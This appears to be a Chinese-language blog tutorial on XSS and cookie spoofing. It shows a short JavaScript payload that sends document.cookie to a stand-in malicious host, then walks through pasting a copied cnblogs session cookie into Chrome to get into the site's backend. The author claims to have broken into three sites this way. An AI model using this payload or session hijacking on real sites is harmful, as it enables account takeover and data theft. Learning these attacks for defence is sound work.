通过COOKIE欺骗登录网站后台
通过COOKIE欺骗登录网站后台
\1. 今天闲着没事看了看关于 XSS(跨站脚本攻击)和 CSRF(跨站请求伪造)的知识,xss 表示 Cross Site Scripting(跨站脚本攻击),它与 SQL 注入攻击类似,SQL 注入攻击中以 SQL 语句作为用户输入,从而达到查询 / 修改 / 删除数据的目的,而在 xss 攻击中,通过插入恶意脚本,实现对用户游览器的控制,CSRF 全名是 Cross-site request forgery,是一种对网站的恶意利用,CSRF 比 XSS 更具危险性。其实 XSS 攻击就是网站输入框没有限制非法字符,或者没有对脚本内容进行编码导致的!
var img = document.createElement('img');
img.src='http://www.xss.com?cookie='+document.cookie;
img.style.display='none';
document.getElementsByTagName('body')[0].appendChild(img);
比如这段代码,当我们没有对网站输入框进行非法字符的限制的话,用户输入了这段脚本,这样就会神不知鬼不觉的把当前用户的 cookie 发送给了我的恶意站点,我的恶意站点通过获取 get 参数就拿到了用户的 cookie。当然我们可以通过这个方法拿到用户各种各样的数据。
\2. 当然我今天说的主要不是这些,而是通过你拿到的 cookie,植入到你的浏览器中然后就可以访问网站后台了,下面我来为大家演示一遍,如何通过已存在的 Cookie,进入博客园后台,我用 IE 浏览器和 Chrome 浏览器来测试!
首先我们通过 IE 浏览器拿到我们登入博客园后的 Cookie,通过 IECookiesview 插件可以查看到 IE 浏览器下所有的 Cookie 信息,然后我们找到 cnblogs.com 站点下的 Cookie,然后复制下. CNBlogsCookie 和 key 和 value 值,如图所示!


\3. 众所周知,cookies 属于隐私数据,不同浏览器保存在不同地方。不可能共享的,此时我们再次打开 Chorme 浏览器,如图 IE 浏览器为登录状态,而 chorme 浏览器为未登录状态


\4. 那么此时我们就将刚拷贝的 IE 浏览器下博客园的 cookie 数据植入到 chrome 浏览器中,实现 cookie 欺骗登录到博客园后台,在 chrome 浏览器中添加 cookies 扩展程序,方便写入和删除 cookie

\5. 然后打开 cookies 插件,我们就找到 cnblogs.com 下的 cookie,默认没有登录的时候是没有. CNBlogsCookie 这个 cookie 的, 然后我们点击添加一个 cookie,将. CNBlogsCookie 和 key 和 value 值写入进去,再刷新网站页面,成功进入博客园网站后台!


\6. 如果将这个方法,再结合到开始讲的 XSS 攻击的话获取到别人网站的 cookie 信息,那么黑进别人网站的后台就很容易了,我自己也试了三个网站,都是可以成功进入的! 当然我说这些不是为了让大家黑别人的网站,只是只有弄懂了这些,才能更好的防范,保证自己开发的网站的安全!

浙公网安备 33010602011771号